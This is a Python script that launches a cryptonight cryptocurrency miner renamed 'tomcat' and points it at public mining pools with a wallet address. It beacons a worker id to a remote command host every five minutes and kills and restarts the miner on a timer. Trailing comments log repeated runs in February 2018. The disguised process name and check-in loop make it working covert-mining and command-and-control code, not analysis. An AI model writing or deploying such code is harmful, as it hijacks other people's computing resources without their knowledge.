import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:05:01.297108
#2018-02-17 16:51:07.061882
#2018-02-17 18:39:07.896614
#2018-02-17 20:27:07.247804
#2018-02-17 22:15:04.624401
#2018-02-17 23:59:03.476077
#2018-02-18 01:50:01.416329
#2018-02-18 03:37:04.366360
#2018-02-18 05:25:01.656740
#2018-02-18 07:17:07.054298
#2018-02-18 09:04:06.825835
#2018-02-18 10:51:04.597906
#2018-02-18 12:37:04.270373
#2018-02-18 14:23:06.631735
#2018-02-18 16:14:07.184435
#2018-02-18 18:03:01.482510
#2018-02-18 19:50:06.627542
#2018-02-18 21:36:04.975936
#2018-02-18 23:24:07.773266
#2018-02-19 01:10:09.007328
#2018-02-19 02:56:02.235782
#2018-02-19 04:43:06.428265
#2018-02-19 06:27:01.495188
#2018-02-19 08:17:03.776008
#2018-02-19 10:05:10.366913
#2018-02-19 11:54:08.953331
#2018-02-19 13:41:06.606637
#2018-02-19 15:28:08.193403
#2018-02-19 17:16:06.512757
#2018-02-19 19:04:04.618197
#2018-02-19 20:50:09.023285
#2018-02-19 22:39:03.869619
#2018-02-20 00:23:06.690673
#2018-02-20 02:12:05.361997
#2018-02-20 04:03:05.604239
#2018-02-20 05:47:06.866705
#2018-02-20 07:32:06.324330
#2018-02-20 09:17:03.522363
#2018-02-20 11:01:05.442831
#2018-02-20 12:48:01.395292
#2018-02-20 14:33:01.648555
#2018-02-20 16:17:04.489403
#2018-02-20 18:03:09.684102
#2018-02-20 19:53:07.504722
#2018-02-20 21:42:04.760079
#2018-02-20 23:24:01.878913
#2018-02-21 01:08:01.468231
#2018-02-21 02:54:01.899874
#2018-02-21 04:41:08.358351
#2018-02-21 06:29:01.855873
#2018-02-21 08:13:05.228743
#2018-02-21 09:59:06.193249
#2018-02-21 11:46:08.629580
#2018-02-21 13:38:04.429183
#2018-02-21 15:21:05.639388
#2018-02-21 17:11:01.910825
#2018-02-21 18:58:07.398716
#2018-02-21 20:47:06.574868
#2018-02-21 22:31:05.273561
#2018-02-22 00:21:08.516057
#2018-02-22 02:08:06.574976
#2018-02-22 03:55:03.243532
#2018-02-22 05:42:04.670550
#2018-02-22 07:26:04.811899
#2018-02-22 09:13:06.002480
#2018-02-22 11:01:07.067447
#2018-02-22 12:46:07.623183
#2018-02-22 14:31:01.875929
#2018-02-22 16:17:12.504083
#2018-02-22 18:03:11.881159
#2018-02-22 19:52:04.483897
#2018-02-22 21:40:08.489204
#2018-02-22 23:26:07.195433
#2018-02-23 01:13:04.483291
#2018-02-23 03:02:01.839253
#2018-02-23 04:46:05.454899
#2018-02-23 06:32:05.980666
#2018-02-23 08:21:05.418113
#2018-02-23 10:37:01.382418
#2018-02-23 12:29:07.125186
#2018-02-23 14:17:04.868056
#2018-02-23 16:07:04.782888
#2018-02-23 17:52:07.808893
#2018-02-23 19:38:06.217340
#2018-02-23 21:21:04.263611
#2018-02-23 23:08:02.059272
#2018-02-24 00:55:04.003074
#2018-02-24 02:50:08.476223
#2018-02-24 04:37:06.517718
#2018-02-24 06:21:04.009074
#2018-02-24 08:08:06.965207
#2018-02-24 09:53:06.996965
#2018-02-24 11:47:07.016890
#2018-02-24 13:38:03.449852
#2018-02-24 15:26:05.578352
#2018-02-24 17:15:06.787696
#2018-02-24 19:07:01.766669
#2018-02-24 20:55:04.879918
#2018-02-24 23:21:05.788778
#2018-02-25 03:24:01.817748
#2018-02-25 07:00:01.990165